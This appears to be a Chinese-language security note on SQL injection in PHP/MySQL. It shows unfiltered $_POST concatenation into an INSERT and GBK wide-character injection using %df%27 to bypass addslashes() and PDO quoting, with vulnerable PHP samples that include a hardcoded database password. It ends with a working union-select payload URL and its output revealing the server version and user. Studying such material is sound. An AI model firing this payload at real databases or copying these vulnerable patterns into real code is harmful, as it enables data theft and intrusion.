【1】普通sql注入:
$sql = "INSERT INTO books(bookname, publisher, author, price, ptime,pic,detail) VALUES('{$_POST["bookname"]}', '{$_POST["publisher"]}', '{$_POST["author"]}', '{$_POST["price"]}', '".time()."', '{$up[1]}', '{$_POST["detail"]}')";
$result = mysql_query($sql);
if($result && mysql_affected_rows() > 0 ) {
echo "插入一条数据成功!";
}else {
echo "数据录入失败!";
}
直接将传入的参数不加过滤进入到数据库中
【2】宽字符注入:
条件
当mysql建表时,将表的字符集设置成gbk时(default
charset=gbk
)
且当在
php
连接数据库时将数据库的字符集设置成
(mysql_query("setcharacter_set_client=gbk");
(1)
可利用
%df%27
绕过
addslashes()
这个函数
(2)
可绕过
pdo
的
quote
()这个函数
(
3
)
pdo
的也被绕过:
第一种写法
:
<?php
header("Content-type:text/html;charset=utf-8");
try {
$pdo = new PDO("mysql:host=localhost;dbname=test","root","niexinming132");
} catch (Exception $ex) {
echo "连接失败";
}
echo "连接成功";
$pdo->query("set character_set_client=gbk");
$id=$_GET["id"];
$query="select * from myuser where id=?";
echo $query;
echo "<br>";
$stmt=$pdo->prepare($query);
$pdostat=$stmt->execute(array($id));
foreach ($stmt->fetchAll(PDO::FETCH_ASSOC) as $row)
{
foreach ($row as $data)
{
echo $data." ";
}
echo "<br>";
}
第二种写法:
<?php
header("Content-type:text/html;charset=utf-8");
try {
$pdo = new PDO("mysql:host=localhost;dbname=test","root","niexinming132");
} catch (Exception $ex) {
echo "连接失败";
}
echo "连接成功";
$pdo->query("set character_set_client=gbk");
$id=$_GET["id"];
$query="select * from myuser where id=:id";
echo $query;
echo "<br>";
$stmt=$pdo->prepare($query);
$pdostat=$stmt->execute(array("id"=>$id));
foreach ($stmt->fetchAll(PDO::FETCH_ASSOC) as $row)
{
foreach ($row as $data)
{
echo $data." ";
}
echo "<br>";
echo "执行完毕";
var_dump($pdo->errorInfo());
}
利用:
http://localhost:8000/gbksql2.php?id=-1%df%27%20union%20select%201,version(),user(),4%20%23
显示:
连接成功select* from myuser where id=:id
1 5.5.50-0ubuntu0.14.04.1-logroot@localhost 4
执行完毕